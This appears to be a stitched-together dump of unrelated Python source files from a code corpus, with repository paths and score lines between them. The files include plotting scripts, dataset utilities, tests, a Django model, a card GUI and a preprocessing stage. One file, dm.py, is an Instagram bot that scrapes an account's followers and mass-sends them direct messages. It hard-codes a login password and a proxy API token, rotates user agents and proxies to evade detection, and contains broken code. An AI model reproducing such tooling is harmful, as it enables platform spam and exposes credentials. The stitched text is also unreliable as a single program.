if not bigger_better:
max_loss = min(max_loss, max_start_loss)
max_loss = max_loss - mean_loss
min_loss = mean_loss - vals.min()
steps.append(ss)
mean.append(mean_loss)
min_val.append(min_loss)
max_val.append(max_loss)
plth.common_ss_vs_metric_errorbar_and_points(
ax, diverged, label, max_start_loss, max_val, mean, min_val, steps
)
def main(args):
assert (not args.full_batch) and args.big_batch
datasets, models, batch_sizes, acc_steps, length = plth.process_args(args)
plth.init_plt_style(plt)
figsize = (
plth.FIGSIZE_4x1_short if args.plot_type == BEST_PLOT else plth.FIGSIZE_4x1
)
fig, axes = plt.subplots(1, length, figsize=figsize)
if args.big_batch and len(datasets) > 1:
if datasets[0] != "squad":
key = datasets[2]
if models[2] == "transformer_encoder":
key = datasets[2] + "_" + models[2]
num_iterations_per_epoch = dataset_sizes[key] // abs(
batch_sizes[2] * acc_steps[2]
)
iteration_limit = 200 * num_iterations_per_epoch
else:
key = datasets[1]
num_iterations_per_epoch = dataset_sizes[key] // abs(
batch_sizes[1] * acc_steps[1]
)
iteration_limit = 80 * num_iterations_per_epoch
else:
iteration_limit = -1
for i in range(length):
y = i // 3
x = i % 3
print(x, y, i)
metric = plth.select_metric(args.metric, datasets[i])
if args.plot_type == BEST_PLOT:
gen_best_run_plot(
args,
models[i],
datasets[i],
axes[i],
batch_size=batch_sizes[i],
acc_step=acc_steps[i],
metric=metric,
yaxis_labels=i == 0,
iteration_limit=iteration_limit,
)
if args.plot_type == METRIC_VS_SS:
gen_step_size_vs_metric_plot(
args,
models[i],
datasets[i],
axes[i],
batch_size=batch_sizes[i],
acc_step=acc_steps[i],
metric=metric,
legend=False,
yaxis_labels=i == 0,
iteration_limit=iteration_limit,
)
if args.plot_type == BEST_PLOT and args.big_batch:
x_lim_max = axes[0].get_xlim()[1]
if models[0] == "bert_base_pretrained":
x_lim_max = 450
y_lim = [math.inf, -math.inf]
for i in range(length):
y_lim = [
min(y_lim[0], axes[i].get_ylim()[0]),
max(y_lim[1], axes[i].get_ylim()[1]),
]
for i in range(length):
curr = axes[i].get_xlim()
axes[i].set_xlim(curr[0], x_lim_max)
axes[i].set_ylim(y_lim[0], min(y_lim[1], 10 ** 7))
fplt.normalize_y_axis(*axes)
fplt.hide_frame(*axes)
fig.tight_layout(pad=0.5)
plth.save_figure(args, datasets, models, plt)
if __name__ == "__main__":
main(plth.cli().parse_args())
| 2.515625 | 3 |
src/feverous/utils/util.py | creisle/FEVEROUS | 42 | 12765024 | import json
import sys
import os
import jsonlines
import traceback
import logging
from tqdm import tqdm
import pickle
import itertools
import linecache
import html
import re
ALL_TITLES = {}
class WikiElement(object):
def get_ids(self) -> list:
"""Returns list of all ids in that element"""
pass
def get_id(self) ->str:
"""Return the specific id of that element"""
def id_repr(self) -> str:
"""Returns a string representation of all ids in that element"""
pass
def __str__(self) -> str:
"""Returns a string representation of the element's content"""
pass
def process_text(text):
return text.strip()
def calculate_title_to_json_map(input_path):
title_to_json_map = {}
from utils.wiki_processor import WikiDataProcessor
wiki_processor = WikiDataProcessor(os.path.join(input_path))
for page in wiki_processor:
# if page.title.name in title_to_json_map:
title_to_json_map[page.title.content] = (wiki_processor.current_file, wiki_processor.current_line)
# else:
# title_to_json_map[page.title.name] = (wiki_processor.current_file, )
return title_to_json_map
class Reader:
def __init__(self,encoding="utf-8"):
self.enc = encoding
def read(self,file):
with open(file,"r",encoding = self.enc) as f:
return self.process(f)
def process(self,f):
pass
class JSONReader(Reader):
def process(self,fp):
return json.load(fp)
class JSONLineReader(Reader):
def process(self,fp):
data = []
for line in fp.readlines():
data.append(json.loads(line.strip()))
return data
| 2.6875 | 3 |
model_building_tools/gen_classes/psql_to_csv.py | jdailey/EnergyPATHWAYS | 26 | 12765025 | <reponame>jdailey/EnergyPATHWAYS<gh_stars>10-100
#!/usr/bin/env python
from __future__ import print_function
import click
import os
import pandas as pd
from postgres import Tables_to_ignore, mkdirs, PostgresDatabase
@click.command()
@click.option('--dbname', '-d', default='pathways',
help='PostgreSQL database name (default="pathways")')
@click.option('--db-dir', '-D', default=None,
help='''Directory under which to store CSV "tables". Defaults to the postgres database name with ".db" extension in the current directory.''')
@click.option('--host', '-h', default='localhost',
help='Host running PostgreSQL (default="localhost")')
@click.option('--user', '-u', default='postgres',
help='PostgreSQL user name (default="postgres")')
@click.option('--password', '-p', default='',
help='PostreSQL password (default="")')
@click.option('--limit', '-l', type=int, default=0,
help='Limit the number of rows read (useful for debugging; default=0, which means unlimited)')
@click.option('--tables', '-t', default='',
help='''A comma-delimited list of table names to process rather than the default,
which is to process all tables.''')
@click.option('--ids/--no-ids', default=False,
help='''
Indicates whether to include database ids in the data, and thus, in the \
generated class, which reads the CSV headers. This option exists to facilitate \
integration, and will be removed for the final production run.''')
@click.option('--shapes/--no-shapes', default=True,
help='Whether to copy the ShapeData directory to the merged database. (Default is --shapes)')
def main(dbname, db_dir, host, user, password, limit, tables, ids, shapes):
db = PostgresDatabase(host=host, dbname=dbname, user=user, password=password, cache_data=False)
db_dir = db_dir or dbname + '.db'
print("Creating CSV database '%s'" % db_dir)
mkdirs(db_dir)
mkdirs(os.path.join(db_dir, 'ids'))
mkdirs(os.path.join(db_dir, 'ShapeData'))
db.load_text_mappings() # to replace ids with strings
tables_to_skip = Tables_to_ignore + ['GeographyIntersection', 'GeographyIntersectionData', 'Geographies', 'GeographyMapKeys', 'GeographiesData']
table_names = (tables and tables.split(',')) or [name for name in db.get_table_names() if name not in tables_to_skip]
table_objs = [db.get_table(name) for name in table_names]
if limit:
print("\n*** Limiting reads to %d rows per table! ***\n" % limit)
def _drop(df, *cols):
df.drop(list(cols), axis=1, inplace=True)
for tbl in table_objs:
if not shapes and tbl.name == 'ShapesData':
continue
tbl.load_all(limit=limit)
# One-off patches
df = tbl.data
if tbl.name == 'DemandServiceLink':
df['name'] = df.id.map(lambda id: 'dem_svc_link_{}'.format(id))
elif tbl.name == 'DemandTechsServiceLink':
df['name'] = df.id.map(lambda id: 'dem_tech_svc_link_{}'.format(id))
_drop(df, 'id')
elif tbl.name == 'DemandTechsServiceLinkData':
df['parent'] = df.parent_id.map(lambda id: 'dem_tech_svc_link_{}'.format(id))
_drop(df, 'id', 'parent_id')
elif tbl.name == 'CurrenciesConversion':
_drop(df, 'id')
elif tbl.name == 'BlendNodeInputsData':
_drop(df, 'id')
elif tbl.name == 'DispatchTransmissionHurdleRate' or tbl.name == 'DispatchTransmissionLosses':
_drop(df, 'id')
tbl.to_csv(db_dir, save_ids=ids)
# if False:
# # Merge generated DemandTechsServiceLink* to form DemandServiceLinkData for 3-way merge
# dtsl = pd.read_csv(os.path.join(db_dir, 'DemandTechsServiceLink.csv'), index_col=None)
# dtsl_data = pd.read_csv(os.path.join(db_dir, 'DemandTechsServiceLinkData.csv'), index_col=None)
# merged = pd.merge(dtsl, dtsl_data, left_on='name', right_on='parent', how='left')
# merged.drop('parent', axis=1, inplace=True)
# merged.rename(index=str, columns={'name': 'old_parent', 'service_link' : 'parent'}, inplace=True)
#
# pathname = os.path.join(db_dir, 'DemandServiceLinkData.csv')
# merged.to_csv(pathname, index=None)
# Save foreign keys so they can be used by CSV database
foreign_keys_path = os.path.join(db_dir, 'foreign_keys.csv')
db.save_foreign_keys(foreign_keys_path)
filename = 'text_mappings.py'
print("Writing", filename)
with open(filename, 'w') as f:
f.write('MappedCols = {\n')
for tbl in table_objs:
cols = tbl.mapped_cols.values()
if cols:
f.write(' "{}" : {},\n'.format(tbl.name, cols))
f.write('}\n')
if __name__ == '__main__':
main()
| 2.453125 | 2 |
tests/test_backwards.py | arvindanugula/flywheel | 72 | 12765026 | <reponame>arvindanugula/flywheel
""" Test backwards-compatible behavior """
import json
from flywheel import Field, Model
from flywheel.fields.types import TypeDefinition, DictType, STRING
from flywheel.tests import DynamoSystemTest
class JsonType(TypeDefinition):
""" Simple type that serializes to JSON """
data_type = json
ddb_data_type = STRING
def coerce(self, value, force):
return value
def ddb_dump(self, value):
return json.dumps(value)
def ddb_load(self, value):
return json.loads(value)
class OldDict(Model):
""" Model that uses an old-style json field as a dict store """
__metadata__ = {
'_name': 'dict-test',
}
id = Field(hash_key=True)
data = Field(data_type=JsonType())
class TestOldJsonTypes(DynamoSystemTest):
""" Test the graceful handling of old json-serialized data """
models = [OldDict]
def setUp(self):
super(TestOldJsonTypes, self).setUp()
OldDict.meta_.fields['data'].data_type = JsonType()
def test_migrate_data(self):
""" Test graceful load of old json-serialized data """
old = OldDict('a', data={'a': 1})
self.engine.save(old)
OldDict.meta_.fields['data'].data_type = DictType()
new = self.engine.scan(OldDict).one()
self.assertEqual(new.data, old.data)
def test_resave_old_data(self):
""" Test the resaving of data that used to be json """
old = OldDict('a', data={'a': 1})
self.engine.save(old)
OldDict.meta_.fields['data'].data_type = DictType()
new = self.engine.scan(OldDict).one()
new.data['b'] = 2
new.sync(raise_on_conflict=False)
ret = self.engine.scan(OldDict).one()
self.assertEqual(ret.data, {'a': 1, 'b': 2})
| 2.53125 | 3 |
insights/parsers/tests/test_neutron_server_log.py | lhuett/insights-core | 121 | 12765027 | <gh_stars>100-1000
from insights.parsers.neutron_server_log import NeutronServerLog
from insights.tests import context_wrap
NEUTRON_LOG = """
2016-09-13 05:56:45.155 30586 WARNING keystonemiddleware.auth_token [-] Identity response: {"error": {"message": "Could not find token: b45405915eb44e608885f894028d37b9", "code": 404, "title": "Not Found"}}
2016-09-13 05:56:45.156 30586 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
2016-09-13 06:06:45.884 30588 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
2016-09-13 06:06:45.886 30588 WARNING keystonemiddleware.auth_token [-] Identity response: {"error": {"message": "Could not find token: <PASSWORD>ba1<PASSWORD>", "code": 404, "title": "Not Found"}}
2016-09-13 06:06:45.887 30588 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
2016-09-13 06:06:46.131 30586 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
2016-09-13 06:06:46.131 30586 WARNING keystonemiddleware.auth_token [-] Identity response: {"error": {"message": "Could not find token: <KEY>0", "code": 404, "title": "Not Found"}}
2016-09-13 06:06:46.132 30586 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
""".strip()
def test_server_log():
neutron_server = NeutronServerLog(context_wrap(NEUTRON_LOG))
assert len(neutron_server.get(["WARNING", "Authorization failed for token"])) == 5
assert len(neutron_server.get(["Identity response:"])) == 3
assert len(neutron_server.get("Identity response:")) == 3
| 2.25 | 2 |
dm.py | seluciano/instagram-scrapping-server | 1 | 12765028 | from selenium import webdriver
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
import time,random,names,os,requests,sys
from seleniumwire import webdriver
from random_username.generate import generate_username
from selenium.webdriver.firefox.options import Options
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.proxy import *
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
global DELAYS,CREDS,driver,proxyauth_plugin_path,proxy
import undetected_chromedriver as uc
from pyvirtualdisplay import Display
from selenium import webdriver
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent
display = Display(visible=0, size=(800, 600))
display.start()
CREDS={}
DELAYS={
"keys_min":50,# Delays in miliseconds
"keys_max":200,
"min":200,
"max":1000,
}
def getProxy():
a=requests.get('https://api.proxyflow.io/v1/proxy/random?token=c9997120aae549e43c4b45a3&country=US&anonymity=elite&ssl=true').json()
while a['protocol'] not in ['https','socks4','socks5']:
a=requests.get('https://api.proxyflow.io/v1/proxy/random?token=c9997120aae549e43c4b45a3&country=US&anonymity=elite&ssl=true').json()
return a
def agent():
a=[
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
'Mozilla/5.0 (X11; Linux i686; rv:82.0) Gecko/20100101 Firefox/82.0',
'Mozilla/5.0 (Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:82.0) Gecko/20100101 Firefox/82.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0',
'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0',
'Mozilla/5.0 (X11; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0',
'Mozilla/5.0 (Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
]
return random.choice(a)
def startDriver():
print('------ startDriver init')
from pyvirtualdisplay import Display
display = Display(visible=0, size=(800, 600))
display.start()
opts = webdriver.ChromeOptions()
opts.binary_location = "/usr/bin/google-chrome"
opts.add_argument(f'--proxy-server={self.proxy}')
opts.add_extension(os.getcwd()+"/Proxy Auto Auth.crx")
opts.add_argument("--proxy-server=http://nataly.ltespace.com:15584")
opts.add_argument("user-agent=%s" % self.agent())
opts.add_argument('--disable-gpu')
# opts.add_argument('--headless')
opts.add_argument('--no-sandbox')
capabilities = DesiredCapabilities.CHROME
self.driver = webdriver.Chrome(chrome_options=opts, desired_capabilities=capabilities,executable_path=f'{BASE_DIR}/chromedriver')
print('------ driver started')
def openLogin():
print('open login')
try:
driver.get('https://www.instagram.com/accounts/login/')
print('login page')
time.sleep(4)
driver.find_element_by_name("username")
return True
except:
return False
def login(un,pw):
print('---------- def login init')
x=openLogin()
while not x:
x=openLogin()
time.sleep(random.randint(DELAYS["min"], DELAYS["max"])/100.0)
driver.find_element_by_name("username").send_keys(un)
time.sleep(random.randint(DELAYS["min"], DELAYS["max"])/100.0)
driver.find_element_by_name("password").send_keys(pw)
time.sleep(random.randint(DELAYS["min"], DELAYS["max"])/100.0)
driver.find_element_by_xpath('''//div[contains(text(),"Log In")]''').click()
time.sleep(10)
def searchUser(name):
print('---------- def searchUser init')
open(os.getcwd()+"/dmlog.txt","a").write('Seraching followers of %s \n' % name)
driver.get('https://www.instagram.com/accounts/onetap')
time.sleep(4)
driver.find_element_by_xpath('''//input[@placeholder='Search']''').send_keys(name)
time.sleep(2)
for i in driver.find_elements_by_xpath('//div/a'):
link=i.get_attribute('href')
if link=='https://www.instagram.com/':
pass
else:
profileLink=link
print(profileLink)
break
if profileLink[-1]=="/":
profileLink=profileLink[:-1]
driver.get(profileLink)
time.sleep(5)
driver.find_element_by_xpath('''//a[@href='/%s/followers/']''' % (profileLink.split("/")[-1])).click()
time.sleep(5)
driver.find_elements_by_xpath('//div/ul/div/li')[0].click()
while 1:
x=len(driver.find_elements_by_xpath('//div/ul/div/li'))
for i in range(500):
try:
driver.find_elements_by_xpath('//div/ul/div/li')[-1].click()
except:
pass
ActionChains(driver).send_keys(Keys.DOWN).perform()
y=len(driver.find_elements_by_xpath('//div/ul/div/li'))
if not y>x:
break
print("Found %d Followers"%(len(driver.find_elements_by_xpath('//div/ul/div/li'))))
open(os.getcwd()+"/dmlog.txt","a").write("Found %d Followers"%(len(driver.find_elements_by_xpath('//div/ul/div/li'))))
return driver.find_elements_by_xpath('//div/ul/div/li//span/a')
def dm(user,message):
print('---------- direct mesasge init')
driver.get("https://www.instagram.com/"+user)
time.sleep(5)
try:
driver.find_element_by_xpath('''//button[contains(text(),"Message")]''').click()
except:
try:
driver.find_element_by_xpath('''//button[contains(text(),"Follow")]''')
except:
print("Cant Send Message")
open(os.getcwd()+"/dmlog.txt","a").write('Cant send DM to %s \n' % user)
raise Exception("Cant Send Message")
time.sleep(5)
try:
driver.find_element_by_xpath('''//button[contains(text(),"Not Now")]''').click()
except:
pass
time.sleep(2)
for i in message:
driver.find_element_by_xpath('''//textarea[@placeholder='Message...']''').send_keys(i)
time.sleep(random.randint(DELAYS["keys_min"], DELAYS["keys_max"])/1000.0)
time.sleep(2)
driver.find_element_by_xpath('''//button[contains(text(),"Send")]''').click()
open(os.getcwd()+"/dmlog.txt","a").write('DM send successfully to %s \n' % user)
def getFollowers(name):
print('---------- def getFollowers init')
un='sajith8827'
pw='36SJ7QBUphCCkY9'
startDriver()
login(un,pw)
return searchUser(name)
def sendDM(user,message,un,pw):
print('---------- def sendDM init')
## un='sajith8827'
## pw='36SJ7QBUphCCkY9'
un=un
pw=pw
startDriver()
login(un,pw)
try:
for i in user:
open(os.getcwd()+"/dmlog.txt","a").write('Sending DM to %s \n' % i)
dm(i,message)
return True
except:
return False
# open(os.getcwd()+"/dmlog.txt","a").write('Starting' )
# us=sys.argv[1]
# msg=sys.argv[2]
# un=sys.argv[3]
# pw=sys.argv[4]
# x=getFollowers(us)
# x=list(map(lambda y:y.text, x))
# sendDM(x,msg,un,pw)
#x=getFollowers("shanaka")
| 2.140625 | 2 |
scripts/dirichlet_3d_spiky_plot.py | karalleyna/pyprobml | 0 | 12765029 | <reponame>karalleyna/pyprobml
import numpy as np
import matplotlib.pyplot as plt
import pyprobml_utils as pml
from mpl_toolkits.mplot3d import proj3d
from scipy.stats import dirichlet
grain = 20 #how many points along each axis to plot
edgedist = 0.008 #How close to an extreme value of say [1,0,0] are we willing to plot.
weight = np.linspace(0, 1, grain)
#Most extreme corners of the sample space
Corner1 = np.array([1.0 - edgedist*2, edgedist, edgedist])
Corner2 = np.array([edgedist, 1.0 - edgedist*2, edgedist])
Corner3 = np.array([edgedist, edgedist, 1.0 - edgedist*2])
#Probability density function that accepts 2D coordiantes
def dpdf(v1,v2, alphavec):
if (v1 + v2)>1:
out = np.nan
else:
vec = v1 * Corner1 + v2 * Corner2 + (1.0 - v1 - v2)*Corner3
out = dirichlet.pdf(vec, alphavec)
return(out)
#Dirichlet parameter
alphas = [ [20,20,20], [3,3,20], [0.1,0.1,0.1] ]
for i in range(len(alphas)):
alphavec = np.array(alphas[i])
azim = 20
probs = np.array([dpdf(v1, v2, alphavec) for v1 in weight for v2 in weight]).reshape(-1,grain)
fig = plt.figure(figsize=(20,15))
ax = fig.add_subplot(111, projection='3d')
X,Y = np.meshgrid(weight, weight)
ax.plot_surface(Y, X, probs, cmap = 'jet', vmin=0, vmax=3,rstride=1,cstride=1, linewidth=0)
ax.view_init(elev=25, azim=azim)
ax.set_zlabel('p')
ttl = ','.join(['{:0.2f}'.format(d) for d in alphavec])
ax.set_title(ttl)
alpha = int(np.round(alphavec[0]*10))
pml.savefig('dirSimplexAlpha{}.pdf'.format(alpha))
plt.show()
if 0:
fig = plt.figure(figsize=(20,15))
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(Y, X, probs, cmap = 'jet', vmin=0, vmax=3,rstride=1,cstride=1, linewidth=0)
ax.view_init(elev=25, azim=200)
ax.set_zlabel('p')
ttl = ','.join(['{:0.2f}'.format(d) for d in alphavec])
ax.set_title(ttl)
alpha = np.round(alphavec[0]*10)
pml.savefig('alpha.pdf')
plt.show()
| 2.359375 | 2 |
tests/test_core.py | mathbou/seed_intersphinx_mapping | 3 | 12765030 | <reponame>mathbou/seed_intersphinx_mapping
# stdlib
from typing import get_type_hints
# 3rd party
import packaging.requirements
import pytest
from coincidence import PEP_563
# this package
from seed_intersphinx_mapping import cache, get_sphinx_doc_url
def test_get_sphinx_doc_url():
assert cache.clear(get_sphinx_doc_url)
assert get_sphinx_doc_url("domdf_python_tools") == "https://domdf-python-tools.readthedocs.io/en/latest/"
assert get_sphinx_doc_url("domdf-python-tools") == "https://domdf-python-tools.readthedocs.io/en/latest/"
with pytest.raises(packaging.requirements.InvalidRequirement, match="No such project 'domdf_python_toolsz'"):
get_sphinx_doc_url("domdf_python_toolsz")
with pytest.raises(ValueError, match="Documentation URL not found in data from PyPI."):
get_sphinx_doc_url("slumber")
with pytest.raises(ValueError, match="objects.inv not found at url .*: HTTP Status 404"):
get_sphinx_doc_url("isort")
assert cache.clear(get_sphinx_doc_url)
assert not (cache.cache_dir / "get_sphinx_doc_url.json").is_file()
with pytest.raises(ValueError, match="Documentation URL not found in data from PyPI."):
get_sphinx_doc_url("sphinx-prompt")
def test_get_sphinx_doc_url_wrapping():
assert get_sphinx_doc_url.__name__ == "get_sphinx_doc_url"
if PEP_563:
assert get_sphinx_doc_url.__annotations__ == {"pypi_name": "str", "return": "str"}
else:
assert get_sphinx_doc_url.__annotations__ == {"pypi_name": str, "return": str}
assert get_type_hints(get_sphinx_doc_url) == {"pypi_name": str, "return": str}
assert get_sphinx_doc_url.__defaults__ is None
assert get_sphinx_doc_url.__doc__.startswith("\n Returns the URL to the given project's Sphinx documentation.")
assert get_sphinx_doc_url.__wrapped__
| 2.09375 | 2 |
FairTest/users/models.py | RexWangSida/FairTest | 3 | 12765031 | <gh_stars>1-10
from django.db import models
from django_mysql.models import ListCharField
# Create your models here.
class User(models.Model):
email = models.CharField(max_length = 60, unique=True)
uid = models.CharField(max_length = 10, unique=True, primary_key=True)
school = models.CharField(max_length = 30)
password = models.CharField(max_length = 6)
firstName = models.CharField(max_length = 30)
lastName = models.CharField(max_length = 30)
regTests = ListCharField(
base_field=models.CharField(max_length=10),
size=10,
max_length=(10 * 11) # 6 * 10 character nominals, plus commas
)
def __str__(self):
return self.firstName + " " + self.lastName
| 2.53125 | 3 |
tests/resources/xmpp_handlers.py | pombreda/tipfy | 23 | 12765032 | from tipfy.appengine.xmpp import BaseHandler, CommandHandler
class XmppHandler(CommandHandler):
def foo_command(self, message):
message.reply('Foo command!')
def bar_command(self, message):
message.reply('Bar command!')
def text_message(self, message):
super(XmppHandler, self).text_message(message)
message.reply(message.body)
class XmppHandler2(BaseHandler):
pass
| 2.515625 | 3 |
vial-plugin/mail/api.py | baverman/vial-mail | 1 | 12765033 | <reponame>baverman/vial-mail<gh_stars>1-10
import os.path
from email.parser import HeaderParser
from email.utils import getaddresses
from email.header import decode_header
from unidecode import unidecode
def get_book(fname):
result = []
for line in open(fname):
addr, title = line.rstrip('\r\n').split('\t')
try:
title = title.decode('utf-8')
except UnicodeDecodeError:
title = title.decode('cp1251')
result.append(('{} {}'.format(addr, unidecode(title)).lower(),
'{} <{}>'.format(title.encode('utf-8'), addr) if title else addr))
return sorted(result)
def dheader(header):
parts = decode_header(header)
result = u''
for r, enc in parts:
enc = enc or 'ascii'
result += r.decode(enc)
return result.encode('utf-8')
def get_addresses(maildir):
emails = {}
for root, _dirs, files in os.walk(maildir):
for fname in files:
fname = os.path.join(root, fname)
msg = HeaderParser().parse(open(fname))
froms = msg.get_all('from', [])
tos = msg.get_all('to', [])
ccs = msg.get_all('cc', [])
resent_tos = msg.get_all('resent-to', [])
resent_ccs = msg.get_all('resent-cc', [])
all_recipients = getaddresses(froms + tos + ccs + resent_tos + resent_ccs)
for (title, addr) in all_recipients:
emails.setdefault(addr, set()).add(title)
for addr, titles in emails.iteritems():
clean = set()
for title in titles:
if title.startswith('=?'):
title = dheader(title)
title = title.strip("'\"<>").replace('\n', ' ')
if title and title != addr:
clean.add(title)
if clean:
for title in clean:
yield addr, title
else:
yield addr, ''
| 2.5 | 2 |
examples/deck_of_cards_gui.py | Ellis0817/Introduction-to-Programming-Using-Python | 0 | 12765034 | """Dock of card GUI."""
import random
from tkinter import Button # Import tkinter
from tkinter import Frame # Import tkinter
from tkinter import Label # Import tkinter
from tkinter import LEFT # Import tkinter
from tkinter import PhotoImage
from tkinter import Tk # Import tkinter
class DeckOfCardsGUI(object):
"""Docstring for DeckOfCardsGUI."""
def __init__(self):
"""Initialize DeckOfCardsGUI."""
window = Tk() # Create a window
window.title("Pick Four Cards Randomly") # Set title
self.image_list = [] # Store images for cards
for i in range(1, 53):
self.image_list.append(PhotoImage(
file="image/card/" + str(i) + ".gif"))
frame = Frame(window) # Hold four labels for cards
frame.pack()
self.label_list = [] # A list of four labels
for i in range(4):
self.label_list.append(Label(frame, image=self.image_list[i]))
self.label_list[i].pack(side=LEFT)
Button(window, text="Shuffle", command=self.shuffle).pack()
window.mainloop() # Create an event loop
def shuffle(self):
"""Choose four random cards."""
random.shuffle(self.image_list)
for i in range(4):
self.label_list[i]["image"] = self.image_list[i]
DeckOfCardsGUI() # Create GUI
| 3.375 | 3 |
app/utils/assets.py | coolpalani/Flask-Salt | 12 | 12765035 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# __author__: Yxn
# date: 2016/10/14
from flask_assets import Bundle
bundles = {
'common_css': Bundle(
'css/body.css',
'css/lib/adminlte/adminlte.min.css',
'css/lib/bootstrap/bootstrap.min.css',
'css/lib/skins/skin-blue.min.css',
'css/lib/fontawesome/font-awesome.min.css',
output='css/common.css',
filters='cssmin'
),
'common_js': Bundle(
'js/lib/jquery/jquery.min.js',
'js/lib/app/app.min.js',
'js/lib/bootstrap/bootstrap.min.js',
'js/lib/validate/jquery.validate.js',
output='js/common.js',
filters='jsmin'
),
}
| 1.539063 | 2 |
alice.py | finnsjames/ssn | 0 | 12765036 | import govt
import service
from cryptography.hazmat.primitives.asymmetric import dh
import tools
def print_as_hex(data: bytes):
print(data.hex())
def main():
NAME = "Alice"
# TODO: This is just to get a large prime number
params = dh.generate_parameters(generator=2, key_size=512)
p = params.parameter_numbers().p
g = pow(tools.get_random_int(p), 2, p)
q = int((p + 1) / 2) - 1
print(f"{pow(g, q - 1, p)==g}")
print(f"g={g}, p={p}, q={q}")
# generate SSN
my_govt = govt.Govt()
ssn = my_govt.register(NAME, q)
my_service = service.Service()
uid = my_service.new_user(NAME)
r = tools.get_random_int(q)
Y = pow(g, ssn, p)
A = pow(g, r, p)
c = my_service.get_challenge(uid, Y, A, q)
z = r + (c * ssn) % p
if my_service.verify(uid, g, p, z):
print("Successfully verified!\n")
return 0
else:
print("Failed to verify!\n")
return 1
# show credentials anonymously
if __name__ == "__main__":
REPETITIONS = 100
for i in range(REPETITIONS):
if main() > 0:
break
| 2.875 | 3 |
preprocess/proc_stage2.py | 3dlg-hcvc/ANCSH-pytorch | 2 | 12765037 | import os
import h5py
import pandas as pd
import logging
import numpy as np
from progress.bar import Bar
from multiprocessing import Pool, cpu_count
from omegaconf import OmegaConf
from tools.utils import io
# from ANCSH_lib.utils import NetworkType
# from tools.visualization import Viewer, ANCSHVisualizer
import utils
from utils import JointType
log = logging.getLogger('proc_stage2')
class ProcStage2Impl:
def __init__(self, cfg):
self.output_path = cfg.output_path
self.input_h5_path = cfg.input_h5_path
self.stage1_tmp_dir = cfg.stage1_tmp_dir
self.tmp_output_dir = cfg.tmp_output_dir
self.rest_state_data_filename = cfg.rest_state_data_filename
self.object_infos_path = cfg.object_infos_path
self.heatmap_threshold = cfg.heatmap_threshold
self.epsilon = 10e-8
self.export = cfg.export
@staticmethod
def get_joint_params(vertices, joint, selected_vertices):
heatmap = -np.ones((vertices.shape[0]))
unitvec = np.zeros((vertices.shape[0], 3))
joint_pos = joint['abs_position']
joint_axis = joint['axis']
joint_axis = joint_axis / np.linalg.norm(joint_axis)
joint_axis = joint_axis.reshape((3, 1))
if joint['type'] == JointType.revolute.value:
vec1 = vertices - joint_pos
# project to joint axis
proj_len = np.dot(vec1, joint_axis)
# np.clip(proj_len, a_min=self.epsilon, a_max=None, out=proj_len)
proj_vec = proj_len * joint_axis.transpose()
orthogonal_vec = - vec1 + proj_vec
tmp_heatmap = np.linalg.norm(orthogonal_vec, axis=1).reshape(-1, 1)
tmp_unitvec = orthogonal_vec / tmp_heatmap
heatmap[selected_vertices] = tmp_heatmap[selected_vertices].reshape(-1)
unitvec[selected_vertices] = tmp_unitvec[selected_vertices]
elif joint['type'] == JointType.prismatic.value:
heatmap[selected_vertices] = 0
unitvec[selected_vertices] = joint_axis.transpose()
else:
log.error(f'Invalid joint type {joint["axis"]}')
heatmap = np.where(heatmap >= 0, heatmap, np.inf)
return heatmap, unitvec
def __call__(self, idx, input_data):
input_h5 = h5py.File(self.input_h5_path, 'r')
object_infos = io.read_json(self.object_infos_path)
output_filepath = os.path.splitext(self.output_path)[0] + f'_{idx}' + os.path.splitext(self.output_path)[-1]
h5file = h5py.File(output_filepath, 'w')
bar = Bar(f'Stage2 Processing chunk {idx}', max=len(input_data))
for index, row in input_data.iterrows():
instance_name = f'{row["objectCat"]}_{row["objectId"]}_{row["articulationId"]}_{row["frameId"]}'
in_h5frame = input_h5[instance_name]
mask = in_h5frame['mask'][:]
points_camera = in_h5frame['points_camera'][:]
points_rest_state = in_h5frame['points_rest_state'][:]
parts_camera2rest_state = in_h5frame['parts_transformation'][:]
camera2base = in_h5frame['base_transformation'][:]
stage1_tmp_data_dir = os.path.join(self.stage1_tmp_dir, row['objectCat'], row['objectId'])
rest_state_data_path = os.path.join(stage1_tmp_data_dir, self.rest_state_data_filename)
rest_state_data = io.read_json(rest_state_data_path)
part_info = object_infos[row['objectCat']][row['objectId']]['part']
num_parts = len(part_info)
# process points related ground truth
object_info = object_infos[row['objectCat']][row['objectId']]['object']
# diagonal axis aligned bounding box length to 1
# (0.5, 0.5, 0.5) centered
naocs_translation = - np.asarray(object_info['center']) + 0.5 * object_info['scale']
naocs_scale = 1.0 / object_info['scale']
naocs = points_rest_state + naocs_translation
naocs *= naocs_scale
naocs_transformation = np.reshape(camera2base, (4, 4), order='F')
naocs_transformation[:3, 3] += naocs_translation
naocs2cam_transformation = np.linalg.inv(naocs_transformation).flatten('F')
naocs2cam_scale = 1.0 / naocs_scale
points_class = np.empty_like(mask)
npcs = np.empty_like(points_rest_state)
parts_npcs2cam_transformation = np.empty_like(parts_camera2rest_state)
parts_npcs2cam_scale = np.empty(num_parts)
